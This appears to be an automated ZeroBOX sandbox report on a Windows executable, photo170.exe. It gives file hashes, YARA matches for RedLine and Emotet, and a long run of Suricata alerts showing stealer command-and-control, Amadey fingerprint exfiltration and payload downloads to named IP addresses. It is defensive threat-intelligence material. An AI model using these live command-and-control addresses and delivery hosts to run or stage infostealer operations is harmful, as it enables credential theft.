Summary | ZeroBOX

photo170.exe

RedLine Infostealer Emotet Gen1 RedLine stealer Confuser .NET .NET framework(MSIL) Malicious Library UPX Malicious Packer Admin Tool (Sysinternals etc ...) PE64 PE File OS Processor Check PE32 .NET EXE CAB DLL
Category Machine Started Completed
FILE s1_win7_x6401 July 24, 2023, 7:34 a.m. July 24, 2023, 7:40 a.m.
Size 514.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 65c0aab9f3cc5187b6d90b66fc734abc
SHA256 fa70300a94862a5e2bab49a39e80784a617c68b1e11ec651d003760c42e80e8d
CRC32 5B6A3CB0
ssdeep 12288:/Mriy90V78NeF8ndk5mtMRVwcRsds1ylOI1:RyS8NeJ5mq5savo
PDB Path wextract.pdb
Yara
  • UPX_Zero - UPX packed file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
files.catbox.moe 108.181.20.35
IP Address Status Action
108.181.20.35 Active Moloch
164.124.101.2 Active Moloch
77.91.124.31 Active Moloch
77.91.68.3 Active Moloch
77.91.68.30 Active Moloch
77.91.68.68 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 77.91.68.68:19071 -> 192.168.56.101:49180 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49188 -> 77.91.124.31:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 77.91.124.31:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 77.91.68.3:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49181 -> 77.91.68.3:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 77.91.68.3:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49186 -> 77.91.68.3:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49198 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49198 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49182 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.124.31:80 -> 192.168.56.101:49182 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49186 -> 77.91.68.3:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49182 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49207 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49204 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49217 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49217 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49206 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49246 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49247 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49246 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49222 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49253 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49265 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49265 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49265 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49200 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49267 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49224 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49276 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043233 ET MALWARE RedLine Stealer TCP CnC net.tcp Init A Network Trojan was detected
TCP 192.168.56.101:49277 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49279 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49236 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49236 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49281 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49236 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.68.68:19071 -> 192.168.56.101:49230 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49242 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49285 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49285 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49285 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49215 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49291 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49226 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49302 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49307 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49250 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49307 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49227 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49312 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49313 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49313 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49313 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49315 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49315 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49315 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49195 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49195 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49320 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49320 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49195 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49320 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49252 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49264 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49197 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49197 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49323 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49188 -> 77.91.124.31:80 2017598 ET MALWARE Possible Kelihos.F EXE Download Common Structure A Network Trojan was detected
TCP 192.168.56.101:49197 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 77.91.124.31:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 77.91.124.31:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49260 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49323 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
